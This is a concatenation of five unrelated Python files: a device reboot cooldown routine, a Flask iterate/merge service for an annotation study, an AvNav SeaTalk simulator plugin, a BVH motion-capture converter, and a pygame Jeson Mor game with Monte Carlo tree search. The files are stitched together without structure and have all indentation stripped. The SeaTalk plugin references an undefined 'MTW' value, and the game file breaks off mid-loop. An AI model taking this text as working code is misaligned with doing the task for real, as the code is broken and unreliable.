if reboot_device(raw_args=raw_args):
getLogger().info("Device {} was rebooted.".format(self.device))
self.device["reboot_time"] = datetime.datetime.now()
else:
self.device.pop("rebooting")
getLogger().error(
"Device {} could not be rebooted.".format(self.device)
)
success = False
# sleep for device cooldown
if self.args.platform.startswith("ios") or self.args.platform.startswith(
"android"
):
getLogger().info("Sleep 180 seconds")
time.sleep(180)
else:
getLogger().info("Sleep 20 seconds")
time.sleep(20)
with self.LOCK:
getLogger().info("CoolDownDevice lock acquired")
# device should be available again, remove rebooting flag.
if "rebooting" in self.device:
del self.device["rebooting"]
if success:
self.device["available"] = True
device_str = getDevicesString([self.device])
self.db.updateDevices(self.args.claimer_id, device_str, False)
getLogger().info(
"Device {}({}) available".format(
self.device["kind"], self.device["hash"]
)
)
else:
self.device["live"] = False
getLogger().info("CoolDownDevice lock released")
|
iterate_service.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# import python libs
from flask import Flask
from flask import jsonify
from flask import request
from pprint import pprint as pp
import argparse
import json
import logging
import sys
import socket
import requests
import threading
# import project libs
sys.path.append('lib')
import iteration_processing
import merge_processing
# defining globals & constants
global app
global args
app = Flask(__name__)
# Flask routes
@app.route('/iterate', methods=['GET'])
def iterate_who_are_you():
message = {
'role': 'iterate',
'title': 'Research Study Iterator',
'description': 'Iterating pregenerated data for Robert\'s research study.',
'version': 1.0,
'problem_id': 'ner',
'interface_types': [ 'ner_complete', 'questionnaire' ]
}
return create_json_response_from(message)
@app.route('/iterate', methods=['POST'])
def iterate():
if args.async:
logging.info('iterate request (async)')
data = request.json
threading.Thread(target=async_iteration_processing, args=(data,)).start()
return create_json_response_from({ 'status': 'async' })
else:
logging.info('iterate request (request)')
documents = iteration_processing.process_iteration(request.json['raw_data'])
return create_json_response_from({
'annotation_documents': documents
})
def async_iteration_processing(data):
documents = iteration_processing.process_iteration(data['raw_data'])
annotation_documents = { 'annotation_documents': documents }
res = requests.post(
data['callback_urls'][0],
data=json.dumps(annotation_documents),
headers={ 'Content-Type': 'application/json' }
)
@app.route('/merge', methods=['GET'])
def merge_who_are_you():
message = {
'role': 'merge',
'title': 'Research Study Merger',
'description': 'Merges subject annotations data for Robert\'s research study.',
'version': 1.0,
'problem_id': 'ner'
}
return create_json_response_from(message)
@app.route('/merge', methods=['POST'])
def merge():
if args.async:
logging.info('merge request (async)')
data = request.json
threading.Thread(target=async_merge_processing, args=(data,)).start()
return create_json_response_from({ 'status': 'async' })
else:
logging.info('merge request (request)')
(raw_datum_id, annotation_documents) = merge_processing.decode_post_data(request.json)
logging.info('received %s documents as parts of raw datum #%s' % (len(annotation_documents), raw_datum_id))
raw_datum = merge_processing.create_new_raw_datum(raw_datum_id, annotation_documents)
return create_json_response_from(raw_datum)
def async_merge_processing(data):
(raw_datum_id, annotation_documents) = merge_processing.decode_post_data(data)
logging.info('received %s documents as parts of raw datum #%s' % (len(annotation_documents), raw_datum_id))
raw_datum = merge_processing.create_new_raw_datum(raw_datum_id, annotation_documents)
res = requests.patch(
data['callback_url'],
data=json.dumps(raw_datum),
headers={ 'Content-Type': 'application/json' }
)
# helpers
def create_json_response_from(hash):
response = jsonify(hash)
response.status_code = 200
return response
# entry point as a stand alone script
if __name__ == '__main__':
usePort = 5200
useHost = 'localhost'
parser = argparse.ArgumentParser(
description='Research Study Iterate & Merge Service; 17.02.17 Robert Greinacher')
parser.add_argument(
'-a',
'--async',
action='store_true',
dest='async',
help='communicates asynchronous and non-blocking with DALPHI')
parser.add_argument(
'-d',
'--daemon',
action='store_true',
dest='daemon',
help='enables daemon mode')
parser.add_argument(
'-l',
'--localhost',
action='store_true',
dest='localhost',
help='use "localhost" instead of current network IP')
parser.add_argument(
'-p',
'--port',
type=int,
help='set the network port number')
parser.add_argument(
'-v',
'--verbose',
action='store_true',
dest='verbose',
help='enables verbose mode')
args = parser.parse_args()
if args.port:
usePort = args.port
if not args.localhost:
hostename = socket.gethostname()
useHost = socket.gethostbyname(hostename)
logging.basicConfig(filename='service.log', level=logging.INFO)
logging.basicConfig(format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
logging.getLogger().addHandler(logging.StreamHandler())
logging.info('start running flask app')
app.run(useHost, usePort, args.verbose)
|
plugin.py
|
import time
import threading
import serial
class Plugin:
CONFIG=[
{
'name': 'device',
'description': 'set to the device path (alternative to usbid)',
'default': '/dev/ttyUSB_SeatalkOut'
},
{
'name': 'usbid',
'description': 'set to the usbid of the device (alternative to device)',
'default': ''
},
{
'name': 'target',
'description': 'select the target (rs232 rpi-gpio)',
'default': 'rs232'
},
{
'name': 'debuglevel',
'description': 'set to the debuglevel',
'default': '0'
},
{
'name': 'dynamic',
'description': 'enable dynamic',
'default': '0'
}
]
@classmethod
def pluginInfo(cls):
"""
the description for the module
@return: a dict with the content described below
parts:
* description (mandatory)
* data: list of keys to be stored (optional)
* path - the key - see AVNApi.addData, all pathes starting with "gps." will be sent to the GUI
* description
"""
return {
'description': 'seatalk 1 protocol generator',
'config': cls.CONFIG,
'data': [
]
}
def __init__(self,api):
"""
initialize a plugins
do any checks here and throw an exception on error
do not yet start any threads!
@param api: the api to communicate with avnav
@type api: AVNApi
"""
self.api = api # type: AVNApi
#we register an handler for API requests
self.lastReceived=0
self.isConnected=False
self.connection=None
self.device=None
self.debuglevel=None
self.dynamic=None
self.target=None
self.isBusy=False
self.condition=threading.Condition()
if hasattr(self.api,'registerEditableParameters'):
self.api.registerEditableParameters(self.CONFIG,self._changeConfig)
if hasattr(self.api,'registerRestart'):
self.api.registerRestart(self._apiRestart)
self.changeSequence=0
self.startSequence=0
self.DBT = 6.7
self.DBT_step = 0.1
self.STW = 10.9
self.STW_step = 0.5
def _apiRestart(self):
self.startSequence+=1
self.changeSequence+=1
def _changeConfig(self,newValues):
self.api.saveConfigValues(newValues)
self.changeSequence+=1
def getConfigValue(self,name):
defaults=self.pluginInfo()['config']
for cf in defaults:
if cf['name'] == name:
return self.api.getConfigValue(name,cf.get('default'))
return self.api.getConfigValue(name)
def run(self):
startSequence=self.startSequence
while startSequence == self.startSequence:
try:
#only AvNav after 20210224
self.api.deregisterUsbHandler()
except:
pass
self.runInternal()
def runInternal(self):
"""
the run method
this will be called after successfully instantiating an instance
this method will be called in a separate Thread
The plugin sends every 10 seconds the depth value via seatalk
@return:
"""
changeSequence=self.changeSequence
seq=0
self.api.log("started")
self.api.setStatus('STARTED', 'running')
enabled=self.getConfigValue('enabled')
if enabled is not None and enabled.lower()!='true':
self.api.setStatus("INACTIVE", "disabled by config")
return
usbid=None
try:
self.device=self.getConfigValue('device')
self.dynamic=self.getConfigValue('dynamic')
self.debuglevel=self.getConfigValue('debuglevel')
self.target=self.getConfigValue('target')
usbid=self.getConfigValue('usbid')
if usbid == '':
usbid=None
if self.device == '':
self.device=None
if self.device is None and usbid is None:
raise Exception("missing config value device or usbid")
if self.device is not None and usbid is not None:
raise Exception("only one of device or usbid can be set")
except Exception as e:
self.api.setStatus("ERROR", "config error %s "%str(e))
while changeSequence == self.changeSequence:
time.sleep(0.5)
return
if usbid is not None:
self.api.registerUsbHandler(usbid,self.deviceConnected)
self.api.setStatus("STARTED", "using usbid %s, baud=4800" % (usbid))
else:
self.api.setStatus("STARTED","using device %s, baud=4800"%(self.device))
connectionHandler=threading.Thread(target=self.handleConnection, name='seatalk1-simulator-rs232')
connectionHandler.setDaemon(True)
connectionHandler.start()
while changeSequence == self.changeSequence:
if not self.isConnected:
return {'status': 'not connected'}
try:
''' DPT: 00 02 YZ XX XX Depth below transducer: XXXX/10 feet '''
''' write DBT Seatalk frame => 0x00DD => 22,1 feets => 6,736 meters (divisor 3,683) '''
self.connection.flushOutput()
self.connection.parity = serial.PARITY_MARK
if(self.target == "rpi-gpio"):
self.connection.write(b'\x00\x42')
else:
self.connection.write(b'\x00')
time.sleep(0.1)
self.connection.parity = serial.PARITY_SPACE
if(self.target == "rpi-gpio"):
self.connection.write(b'\x64')
else:
self.connection.write(b'\x42\x64')
DBT = int((self.DBT * (10.0 * 3.281)) + 0.5)
byte_array = DBT.to_bytes(2,"little")
self.connection.write(byte_array)
time.sleep(0.1)
if(int(self.debuglevel) > 0):
self.api.log("SEATALK DBT frame written: "+ str(self.DBT) + ", INT: " + str(DBT))
''' STW: 20 01 XX XX Speed through water: XXXX/10 Knots '''
''' write STW Seatalk frame => 0x003b => 5,9 kn => 10,93 km/h (multiply with 1,852)'''
self.connection.flushOutput()
self.connection.parity = serial.PARITY_MARK
if(self.target == "rpi-gpio"):
self.connection.write(b'\x20\x41')
else:
self.connection.write(b'\x20')
time.sleep(0.1)
self.connection.parity = serial.PARITY_SPACE
if(self.target != "rpi-gpio"):
self.connection.write(b'\x41')
STW = int((((self.STW * 10.0) / 1.852)) + 0.5)
byte_array = STW.to_bytes(2,"little")
self.connection.write(byte_array)
time.sleep(0.1)
if(int(self.debuglevel) > 0):
self.api.log("SEATALK STW frame written: " + str(self.STW) + ", INT: " + str(STW))
''' MTW: 23 01 XX YY water temperature: XX deg C, YY deg F '''
self.connection.flushOutput()
self.connection.parity = serial.PARITY_MARK
if(self.target == "rpi-gpio"):
self.connection.write(b'\x23\x41')
else:
self.connection.write(b'\x23')
time.sleep(0.1)
self.connection.parity = serial.PARITY_SPACE
if(self.target != "rpi-gpio"):
self.connection.write(b'\x41')
self.connection.write(b'\x04')
self.connection.write(b'\x27')
time.sleep(0.1)
if(int(self.debuglevel) > 0):
self.api.log("SEATALK MTW frame written: " + str(self.MTW) + ", INT: " + str(MTW))
except Exception as e:
self.api.error("unable to send command to %s: %s" % (self.device, str(e)))
time.sleep(1)
def handleConnection(self):
changeSequence=self.changeSequence
errorReported=False
lastDevice=None
while changeSequence == self.changeSequence:
if self.device is not None:
if self.device != lastDevice:
self.api.setStatus("STARTED", "trying to connect to %s at 4800" % (self.device))
lastDevice=self.device
#on windows we would need an integer as device...
try:
pnum = int(self.device)
except:
pnum = self.device
self.isConnected=False
self.isBusy=False
try:
self.connection = serial.Serial(port=pnum, baudrate=4800, bytesize=serial.EIGHTBITS, parity=serial.PARITY_MARK, stopbits=serial.STOPBITS_ONE, timeout=None, xonxoff=False, rtscts=False, dsrdtr=False)
self.api.setStatus("NMEA","connected to %s at 4800"%(self.device))
self.api.log("connected to %s at 4800" % (self.device))
self.isConnected=True
errorReported=False
#continously read data to get an exception if disconnected
while True:
#self.connection.readline(10)
if(int(self.dynamic) > 0):
self.DBT += self.DBT_step
if(self.DBT > 20.0):
self.DBT = 20.0
self.DBT_step = -0.5
if(self.DBT < 0.5):
self.DBT = 0.5
self.DBT_step = +0.5
self.STW += self.STW_step
if(self.STW > 13.0):
self.STW = 13.0
self.STW_step = -0.2
if(self.STW < 1.0):
self.STW = 1.0
self.STW_step = +0.2
else:
self.DBT = 6.7
self.DBT_step = 0.1
self.STW = 10.9
self.STW_step = 0.5
time.sleep(2)
except Exception as e:
if not errorReported:
self.api.setStatus("ERROR","unable to connect/connection lost to %s: %s"%(self.device, str(e)))
self.api.error("unable to connect/connection lost to %s: %s" % (self.device, str(e)))
errorReported=True
self.isConnected=False
time.sleep(1)
time.sleep(1)
|
convert_clip_multiprocess.py
|
import os
import sys
sys.path.append(os.getcwd())
from utils import *
from utils.transformation import quaternion_from_euler
from mujoco_py import load_model_from_path
from mocap.skeleton import Skeleton
from mocap.pose import load_bvh_file, interpolated_traj
import pickle
import glob
import argparse
import time
import multiprocessing
from scipy.ndimage.filters import median_filter
def get_qpos(pose, bone_addr):
"""
:param pose: - ind1 = [a, b] ind2 = [a', b']
:param bone_addr: bvh address
:return:
"""
qpos = np.zeros(model.nq)
for bone_name, ind2 in body_qposaddr.items():
ind1 = bone_addr[bone_name]
if ind1[0] == 0:
trans = pose[ind1[0]:ind1[0] + 3].copy()
angles = pose[ind1[0] + 3:ind1[1]].copy()
quat = quaternion_from_euler(angles[0], angles[1], angles[2], 'rxyz')
qpos[ind2[0]:ind2[0] + 3] = trans
qpos[ind2[0] + 3:ind2[1]] = quat
else:
qpos[ind2[0]:ind2[1]] = pose[ind1[0]:ind1[1]]
return qpos
def get_poses(bvh_file):
time0_get_poses = time.time() # time start load.
poses, bone_addr = load_bvh_file(bvh_file, skeleton)
poses_samp = interpolated_traj(poses, args.dt, mocap_fr=args.mocap_fr)
qpos_traj = []
for i in range(poses_samp.shape[0]):
cur_pose = poses_samp[i, :]
cur_qpos = get_qpos(cur_pose, bone_addr)
qpos_traj.append(cur_qpos)
qpos_traj = np.vstack(qpos_traj)
# post-process qpos
# set the feet on ground plane
qpos_traj[:, 2] += args.offset_z
time_cost_get_poses = time.time() - time0_get_poses # time spend.
print('-> get_poses spends {:.2f}s on {} with {:0>6d} frames'.format(time_cost_get_poses, bvh_file, poses.shape[0]))
return qpos_traj
def bvh2traj(file):
print('start extracting trajectory from %s' % file)
qpos_traj = get_poses(file)
name = os.path.splitext(os.path.basename(file))[0]
# bvh_dir = os.path.dirname(file)
# traj_p_folder = bvh_dir.replace('traj_bvh', 'traj_p')
traj_file = '%s/datasets/traj_p/%s_traj.p' % (args.mocap_folder, name)
pickle.dump(qpos_traj, open(traj_file, 'wb'))
print('save trajectory to %s' % traj_file)
if __name__=='__main__':
"""
bvh to traj.p to expert
python ./pose_imitation/data_process/convert_clip_multiprocess.py
"""
parser = argparse.ArgumentParser()
parser.add_argument('--render', action='store_true', default=True)
parser.add_argument('--model-id', type=str, default='humanoid_h36m_v4')
parser.add_argument('--mocap-folder', type=str, default='debug')
parser.add_argument('--mocap-fr', type=int, default=30)
parser.add_argument('--dt', type=float, default=1 / 30)
parser.add_argument('--offset-z', type=float, default=0.06)
parser.add_argument('--num-threads', type=int, default=32)
args = parser.parse_args()
timer = Timer()
traj_p_folder = '%s/datasets/traj_p' % args.mocap_folder
recreate_dirs(traj_p_folder)
model_file = 'assets/mujoco_models/%s.xml' % args.model_id
model = load_model_from_path(model_file)
body_qposaddr = get_body_qposaddr(model)
timer.update_time('complete load XML')
bvh_files = glob.glob(os.path.expanduser('%s/datasets/traj_bvh/*.bvh' % args.mocap_folder))
bvh_files.sort()
# if args.range is not None:
# bvh_files = bvh_files[args.range[0]: args.range[1]]
print('bvh_files:', bvh_files)
# init skeleton class.
skt_bvh = bvh_files[0]
exclude_bones = {'Thumb', 'Index', 'Middle', 'Ring', 'Pinky', 'End', 'Toe'}
spec_channels = {'LeftForeArm': ['Zrotation'], 'RightForeArm': ['Zrotation'],
'LeftLeg': ['Xrotation'], 'RightLeg': ['Xrotation']}
skeleton = Skeleton()
skeleton.load_from_bvh(skt_bvh, exclude_bones, spec_channels)
# skeleton.write_xml('assets/mujoco_models/test.xml', 'assets/mujoco_models/template/humanoid_template.xml')
# start
task_lst = bvh_files
num_threads = args.num_threads
for ep in range(math.ceil(len(task_lst) / num_threads)):
p_lst = []
for i in range(num_threads):
idx = ep * num_threads + i
if idx >= len(task_lst):
break
p = multiprocessing.Process(target=bvh2traj, args=(task_lst[idx],))
p_lst.append(p)
for p in p_lst:
p.start()
for p in p_lst:
p.join()
print('complete ep:', ep)
# end.
timer.update_time('complete multiprocessing')
# # save a traj_dict file,
traj_dict_folder = '%s/datasets/traj_dict' % args.mocap_folder
traj_dict_path = '{}/traj_dict.pkl'.format(traj_dict_folder)
if os.path.exists(traj_dict_path):
traj_dict = np.load(traj_dict_path, allow_pickle=True)
else:
recreate_dirs(traj_dict_folder)
traj_dict = {}
take_list = glob.glob('{}/*traj.p'.format(traj_p_folder))
for take in take_list:
take_name = take.split('/')[-1].split('_traj.')[0]
orig_traj = np.load(take, allow_pickle=True)
if not take_name in traj_dict:
traj_dict[take_name] = {}
traj_dict[take_name]['predicted_3d_qpos'] = orig_traj
with open(traj_dict_path, 'wb') as f:
pickle.dump(traj_dict, f, pickle.HIGHEST_PROTOCOL)
|
main.py
|
import queue
import threading
import os
import pygame
import sys
from GUI.board_gui import *
from mcts.nodes import *
from mcts.search import MonteCarloTreeSearch
from state import GameState
from state import GameMove
from position import Position
from board import *
import pygame_textinput
import re
import time
def resource_path(relative_path):
default = "assets/"
relative_path = default + relative_path
try:
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
pygame.init()
pygame.font.init()
# Ustawienia okna gry
screen = pygame.display.set_mode((60*9, 60 * 9))
pygame.display.set_caption('Python Jeson Mor Game')
clock = pygame.time.Clock() # odświeżanie okna
#MENU
menu_image = pygame.image.load(resource_path("gui/home-screen.png"))
button_image = pygame.image.load(resource_path("gui/button.png"))
button_image_small = pygame.image.load(resource_path("gui/small-button.png"))
settings_image = pygame.image.load(resource_path("gui/settings.png"))
mode_image = pygame.image.load(resource_path("gui/mode.png"))
winner_white = pygame.image.load(resource_path("gui/white_winner.png"))
winner_black = pygame.image.load(resource_path("gui/black_winner.png"))
#MENU TEXT
text_color = (124, 73, 0)
highlight_color = (140, 97, 72)
menu_font = pygame.font.Font(resource_path("gui/GROBOLD.ttf"), 20)
menu_font_small = pygame.font.Font(resource_path("gui/GROBOLD.ttf"), 15)
start_game_text = menu_font.render("Start game", True, text_color)
settings_text = menu_font.render("Settings", True, text_color)
quit_text = menu_font.render("Quit", True, text_color)
accept_text = menu_font.render("Accept", True, text_color)
back_text = menu_font_small.render("Back", True, text_color)
player_vs_player_text = menu_font.render("Player vs Player", True, text_color)
player_vs_ai_text = menu_font.render("Player vs AI", True, text_color)
ai_vs_ai_text = menu_font.render("AI vs AI", True, text_color)
textinput_font = pygame.font.Font(resource_path("gui/GROBOLD.ttf"), 22)
# Załadowanie wygenerowanej planszy
bg = pygame.image.load(resource_path("board.png")).convert()
player = 1
board = BoardGUI()
global all_sprites_list, sprites
all_sprites_list = pygame.sprite.Group()
sprites = [piece for row in board.array for piece in row if piece]
all_sprites_list.add(sprites)
def reload_sprites():
return [piece for row in board.array for piece in row if piece]
def select_piece_xy(color, x, y):
# get a list of all sprites that are under the mouse cursor
# lista wszystkich duszków, ktore sa pod kursorem myszy
clicked_sprites = [s for s in sprites if s.x == x and s.y == y]
# podświetla i zwaraca jeśli jest to pionek gracza
if len(clicked_sprites) == 1 and clicked_sprites[0].color == color:
clicked_sprites[0].highlight()
return clicked_sprites[0]
elif len(clicked_sprites) == 1:
return clicked_sprites[0]
def select_piece(color):
pos = pygame.mouse.get_pos()
# get a list of all sprites that are under the mouse cursor
# lista wszystkich duszków, ktore sa pod kursorem myszy
clicked_sprites = [s for s in sprites if s.rect.collidepoint(pos)]
# podświetla i zwaraca jeśli jest to pionek gracza
if len(clicked_sprites) == 1 and clicked_sprites[0].color == color:
clicked_sprites[0].highlight()
return clicked_sprites[0]
elif len(clicked_sprites) == 1:
return clicked_sprites[0]
def select_square():
x, y = pygame.mouse.get_pos()
x = x // 60
y = y // 60
return y, x
# mode:
# 0 - gracz vs gracz
# 1 - gracz vs komputer
# 2 - komputer vs komputer+
def run_game(mode, number_of_simulations):
global all_sprites_list, sprites
global board
board = BoardGUI()
all_sprites_list = pygame.sprite.Group()
sprites = [piece for row in board.array for piece in row if piece]
all_sprites_list.add(sprites)
gameover = False # flaga końca gry
winner = "" # identyfikator zwycięzcy
selected = False
trans_table = dict()
checkWhite = False
player = 1
previous_move = ''
current_move = ''
run_flag = 0
#=====================================
# Threading things
is_simulation_running = False
t1, t2 = None, None
q1, q2 = queue.Queue(), queue.Queue()
# =====================================
screen.blit(bg, (0, 0))
all_sprites_list.draw(screen)
pygame.display.update()
clock.tick(60)
while not gameover:
previous_move = current_move
if player == 1:
if mode == 0 or mode == 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
gameover = True
# wybór pionka do wykonania ruchu
elif event.type == pygame.MOUSEBUTTONDOWN and not selected:
board.unhighlight_optional_moves()
piece = select_piece("w")
# generuje "legalne" ruchy pionka
if piece != Empty and piece.color == "w":
# sprawdzenie dostępnych ruchów
player_moves = piece.gen_legal_moves(board)
# all_player_moves = board.get_all_legal_moves("w")
# podświetlenie dostępnych ruchów
board.highlight_optional_moves(player_moves)
selected = True
# pionek wybrany -> wybór ruchu
elif event.type == pygame.MOUSEBUTTONDOWN and selected:
board.unhighlight_optional_moves()
square = select_square()
# sprawdza czy wybrane pole jest w zasięgu dozwolonych ruchów
if square in player_moves:
oldx = piece.x
oldy = piece.y
dest = board.array[square[0]][square[1]]
# wykonanie ruchu
board.move_piece(piece, square[0], square[1])
if dest: # aktualizacja 'duszków' względem stanu planszy
sprites = reload_sprites()
all_sprites_list.empty()
all_sprites_list.add(sprites)
selected = False
player = 2
# anuluje ruch, jezeli wybrane zostalo to samo pole
elif (piece.y, piece.x) == square:
piece.unhighlight()
selected = False
# ruch jest nieważny
else:
pygame.display.update()
# board.highlight_optional_moves(player_moves)
pygame.time.wait(1000)
elif mode == 2:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
gameover = True
board_mcts = Board(board=simplify_board(board.array))
board_state = GameState(state=board_mcts, next_to_move=1)
root = MonteCarloTreeSearchNode(state=board_state, parent=None)
mcts = MonteCarloTreeSearch(root)
if not is_simulation_running:
t1 = threading.Thread(target=mcts.best_action, args=(number_of_simulations, q1))
t1.daemon = True
t1.start()
is_simulation_running = True
# best_node = mcts.best_action(number_of_simulations)
else:
if not q1.empty():
best_node = q1.get()
# t1.join()
q1.queue.clear()
is_simulation_running = False
c_state = best_node.state
c_board = c_state.board
x_from = c_state.current_move.pos_from.getX()
y_from = c_state.current_move.pos_from.getY()
# print("x_from", x_from)
# print("y_from", y_from)
x_to = c_state.current_move.pos_to.getX()
y_to = c_state.current_move.pos_to.getY()
# print("x_to", x_to)
# print("y_to", y_to)
piece = select_piece_xy("w", x_from, y_from)
square = (x_to, y_to)
dest = board.array[y_to][x_to]
board.move_piece(piece, y_to, x_to) # wykonanie ruchu
if dest:
sprites = reload_sprites()
all_sprites_list.empty()
all_sprites_list.add(reload_sprites())
player = 2
# drugi gracz
elif player == 2:
if mode == 0:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
gameover = True
elif event.type == pygame.MOUSEBUTTONDOWN and not selected:
board.unhighlight_optional_moves()
piece = select_piece("b")
if piece != Empty and piece.color == "b":
# sprawdzenie dostępnych ruchów
player_moves = piece.gen_legal_moves(board)
# print(player_moves)
# podświetlenie dostępnych ruchów
board.highlight_optional_moves(player_moves)
selected = True
elif event.type == pygame.MOUSEBUTTONDOWN and selected:
board.unhighlight_optional_moves()
square = select_square()
if square in player_moves:
oldx = piece.x
oldy = piece.y
dest = board.array[square[0]][square[1]]
# wykonanie ruchu
board.move_piece(piece, square[0], square[1])
if dest:
sprites = reload_sprites()
all_sprites_list.empty()
all_sprites_list.add(reload_sprites())
selected = False
player = 1
elif (piece.y, piece.x) == square:
piece.unhighlight()
selected = False
else:
pygame.display.update()
board.highlight_optional_moves(player_moves)
pygame.time.wait(1000)
elif mode == 1 or mode == 2:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
gameover = True
board_mcts = Board(board=simplify_board(board.array))
# print(board_mcts.boardValues)
board_state = GameState(state=board_mcts, next_to_move=-1)
root = MonteCarloTreeSearchNode(state=board_state, parent=None)
mcts = MonteCarloTreeSearch(root)
if not is_simulation_running:
t2 = threading.Thread(target=mcts.best_action, args=(number_of_simulations, q2))
t2.daemon = True
t2.start()
is_simulation_running = True
# best_node = mcts.best_action(number_of_simulations)
else:
if not q2.empty():
best_node = q2.get()
# t2.join()
q2.queue.clear()
is_simulation_running = False
c_state = best_node.state
c_board = c_state.board
x_from = c_state.current_move.pos_from.getX()
y_from = c_state.current_move.pos_from.getY()
# print("x_from", x_from)
# print("y_from", y_from)
x_to = c_state.current_move.pos_to.getX()
y_to = c_state.current_move.pos_to.getY()
# print("x_to", x_to)
# print("y_to", y_to)
piece = select_piece_xy("b", x_from, y_from)
square = (x_to, y_to)
dest = board.array[y_to][x_to]
board.move_piece(piece, y_to, x_to) # wykonanie ruchu
if dest:
sprites = reload_sprites()
all_sprites_list.empty()
all_sprites_list.add(reload_sprites())
player = 1
screen.blit(bg, (0, 0))
all_sprites_list.draw(screen)
pygame.display.update()
clock.tick(60)
arr = []
for j in range(9):
for piecee in board.array[j]:
arr.append(piecee.color + piecee.symbol)
# check end game
if 'wN' not in arr:
gameover = True
winner = "Black"
elif 'bN' not in arr:
gameover = True
winner = "White"
current_move = arr[40]
if previous_move == 'wN' and current_move == "_N":
gameover = True
winner = "White"
elif previous_move == 'bN' and current_move == "_N":
gameover = True
winner = "Black"
output_board = simplify_board(board.array)
print("Wygrał: ", winner)
if winner == "White":
screen.blit(winner_white, (0, 0))
pygame.display.update()
time.sleep(5)
elif winner == "Black":
screen.blit(winner_black, (0, 0))
pygame.display.update()
time.sleep(5)
def printBoard(boardValues):
for j in range(9):
arr = []
for i in range(9):
x = boardValues[j][i]
if x is not None:
arr.append(x)
else:
arr.append("_")
print(arr)
if __name__ == "__main__":
number_of_simulations = 1000
menu = True
try:
while True:
while menu:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
elif event.type == pygame.MOUSEBUTTONDOWN:
x, y = event.pos
print(x, y)
if button_image.get_rect(topleft=(164, 140)).collidepoint(x, y):
print("start game")
mode = True
while mode:
events = pygame.event.get()
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
x, y = event.pos
if button_image.get_rect(topleft=(164, 140)).collidepoint(x, y):
mode = False
run_game(0, number_of_simulations)
elif button_image.get_rect(topleft=(164, 210)).collidepoint(x, y):
mode = False
run_game(1, number_of_simulations)
elif button_image.get_rect(topleft=(164, 280)).collidepoint(x, y):
mode = False
run_game(2, number_of_simulations)
elif button_image_small.get_rect(topleft=(450, 500)).collidepoint(x, y):
mode = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
mode = False
elif event.type == pygame.QUIT:
pygame.quit()
quit()
x, y = pygame.mouse.get_pos()
if button_image.get_rect(topleft=(164, 140)).collidepoint(x, y):
player_vs_player_text = menu_font.render("Player vs Player", True, highlight_color)
elif button_image.get_rect(topleft=(164, 210)).collidepoint(x, y):
player_vs_ai_text = menu_font.render("Player vs AI", True, highlight_color)
elif button_image.get_rect(topleft=(164, 280)).collidepoint(x, y):
ai_vs_ai_text = menu_font.render("AI vs AI", True, highlight_color)
elif button_image_small.get_rect(topleft=(450, 500)).collidepoint(x, y):
back_text = menu_font_small.render("Back", True, highlight_color)
else:
player_vs_player_text = menu_font.render("Player vs Player", True, text_color)
player_vs_ai_text = menu_font.render("Player vs AI", True, text_color)
ai_vs_ai_text = menu_font.render("AI vs AI", True, text_color)
back_text = menu_font_small.render("Back", True, text_color)
screen.blit(mode_image, (0, 0))
screen.blit(button_image, (164, 140))
screen.blit(player_vs_player_text, (195, 150))
screen.blit(button_image, (164, 210))
screen.blit(player_vs_ai_text, (210, 220))
screen.blit(button_image, (164, 280))
screen.blit(ai_vs_ai_text, (230, 290))
screen.blit(button_image_small, (450, 500))
screen.blit(back_text, (470, 505))
pygame.display.flip()
pygame.display.update()
elif button_image.get_rect(topleft=(164, 210)).collidepoint(x, y):
print("settings")
settings = True
textinput = pygame_textinput.TextInput(initial_string=str(number_of_simulations),
font_family=resource_path("gui/GROBOLD.ttf"), font_size=22,
text_color=(124, 73, 0), max_string_length=10)
while settings:
events = pygame.event.get()
textinput.update(events)
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
x, y = event.pos
if button_image.get_rect(topleft=(164, 250)).collidepoint(x, y):
pattern = re.compile("\d{1,10}$")
if pattern.match(textinput.get_text()):
textinput.set_text_color((0, 255, 0))
number_of_simulations = int(textinput.get_text())
else:
textinput.set_text_color((255, 0, 0))
elif button_image_small.get_rect(topleft=(450, 500)).collidepoint(x, y):
settings = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
settings = False
elif event.type == pygame.QUIT:
pygame.quit()
quit()
try:
if number_of_simulations != int(textinput.get_text()):
textinput.set_text_color((124, 73, 0))
except:
pass
x, y = pygame.mouse.get_pos()
if button_image.get_rect(topleft=(164, 250)).collidepoint(x, y):
accept_text = menu_font.render("Accept", True, highlight_color)
elif button_image_small.get_rect(topleft=(450, 500)).collidepoint(x, y):
back_text = menu_font_small.render("Back", True, highlight_color)
else:
accept_text = menu_font.render("Accept", True, text_color)
back_text = menu_font_small.render("Back", True, text_color)
input_text_size = textinput_font.size(textinput.get_text())
screen.blit(settings_image, (0, 0))
screen.blit(button_image, (164, 250))
screen.blit(accept_text, (230, 260))
screen.blit(button_image_small, (450, 500))
screen.blit(back_text, (470, 505))
screen.blit(textinput.get_surface(), (270 - int(input_text_size[0]/2), 167))
pygame.display.flip()
pygame.display.update()
elif button_image.get_rect(topleft=(164, 280)).collidepoint(x, y):
print("exit")
raise Exception
#Highlight menu text
x, y = pygame.mouse.get_pos()
if button_image.get_rect(topleft=(164, 140)).collidepoint(x, y):
start_game_text = menu_font.render("Start game", True, highlight_color)
elif button_image.get_rect(topleft=(164, 210)).collidepoint(x, y):
settings_text = menu_font.render("Settings", True, highlight_color)
elif button_image.get_rect(topleft=(164, 280)).collidepoint(x, y):
quit_text = menu_font.render("Quit", True, highlight_color)
else:
start_game_text = menu_font.render("Start game", True, text_color)
settings_text = menu_font.render("Settings", True, text_color)
quit_text = menu_font.render("Quit", True, text_color)
#Display menu
screen.blit(menu_image, (0, 0))
screen.blit(button_image, (164, 140))
screen.blit(start_game_text, (215, 150))
screen.blit(button_image, (164, 210))
